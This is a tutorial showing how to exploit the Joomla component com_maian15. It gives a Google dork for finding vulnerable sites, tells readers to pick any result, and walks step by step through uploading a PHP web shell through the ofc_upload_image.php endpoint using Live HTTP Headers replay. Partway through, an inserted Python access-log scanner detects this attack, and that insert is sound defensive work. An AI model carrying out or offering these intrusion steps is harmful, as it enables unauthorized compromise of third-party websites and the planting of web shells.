Exploit Joomla: com_maian15
In this tutorial, I'm going to show you how to upload a shell using Live HTTP Headers through the Joomla component com_maian15.
Finding Vulnerable Target
Dork : "inurl:option=com_maian15"
Exploit:
/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
Browser: Mozilla Firefox
1- First, copy the dork and paste it into Google.
2- Choose any site
Exploiting Target
1- Paste the exploit at the end of the site URL.
Example:
www.site.com/index.php?option=com_maian15&view=album&album=9
into
www.site.com/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
2- If it says,
saving your images to ../tmp-upload-images/
or something similar, it means the site is vulnerable.
3- Now, add name=yourshellname.php at the end of the site URL
Example:
www.site.com/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=bcc.php
4- Hit enter and you will get something like
saving your images to ../tmp-upload-images/bcc.php
5- Now, open up your Firefox extension, Live HTTP Headers, and refresh the page.
6- As you can see, in Live HTTP Headers, there is the URL of the site. Highlight it and click on Replay.
7- Once you click Replay, a popup will appear. Tick Send POST Content and paste your shell script in the column.
8- Click Replay. The page will automatically refresh and your shell is successfully uploaded at
www.site.com/administrator/components/com_maian15/charts/tmp-upload-images/yourshellname.php
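Seen from the server side, steps 1-8 leave a recognizable trail in the access log: a request to ofc_upload_image.php, a POST to it with a name= ending in .php, then a hit on a script inside tmp-upload-images/. The Python check below is an added example, not part of the original tutorial. It assumes Apache/nginx combined log format, and the function names, finding labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [ts] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOADER = "/php-ofc-library/ofc_upload_image.php"
DROP_DIR = "/tmp-upload-images/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def classify(line):
    """Return (client_ip, finding) for a suspicious log line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    if path.endswith(UPLOADER):
        name = parse_qs(url.query).get("name", [""])[0]
        if method == "POST" and SCRIPT_EXT.search(name):
            return ip, "script-upload"   # POST body saved under a script name
        return ip, "uploader-probe"      # the upload script was reached at all
    if DROP_DIR in path and SCRIPT_EXT.search(path):
        # 200 means a script inside the upload directory was actually served
        return ip, "dropped-script-hit" if status == "200" else "dropped-script-miss"
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

def log_line(ip, method, target, status):
    """Build one constructed combined-format log line for the sample below."""
    return (f'{ip} - - [10/Oct/2013:13:55:36 +0000] '
            f'"{method} {target} HTTP/1.1" {status} 512 "-" "-"')

BASE = "/administrator/components/com_maian15/charts"
# Constructed sample log lines (documentation IPs, not from a real server).
SAMPLE = [
    log_line("203.0.113.7", "GET", "/index.php?option=com_maian15&view=album&album=9", 200),
    log_line("203.0.113.7", "GET", BASE + "/php-ofc-library/ofc_upload_image.php?", 200),
    log_line("203.0.113.7", "POST", BASE + "/php-ofc-library/ofc_upload_image.php?name=bcc.php", 200),
    log_line("203.0.113.7", "GET", BASE + "/tmp-upload-images/bcc.php", 200),
    log_line("198.51.100.4", "GET", BASE + "/tmp-upload-images/chart.png", 200),
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

Any "script-upload" or "dropped-script-hit" finding means the upload directory should be inspected for files that are not images, and ofc_upload_image.php removed or blocked at the web server.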
That's all for today's tutorial :P Feel free to leave a comment below :D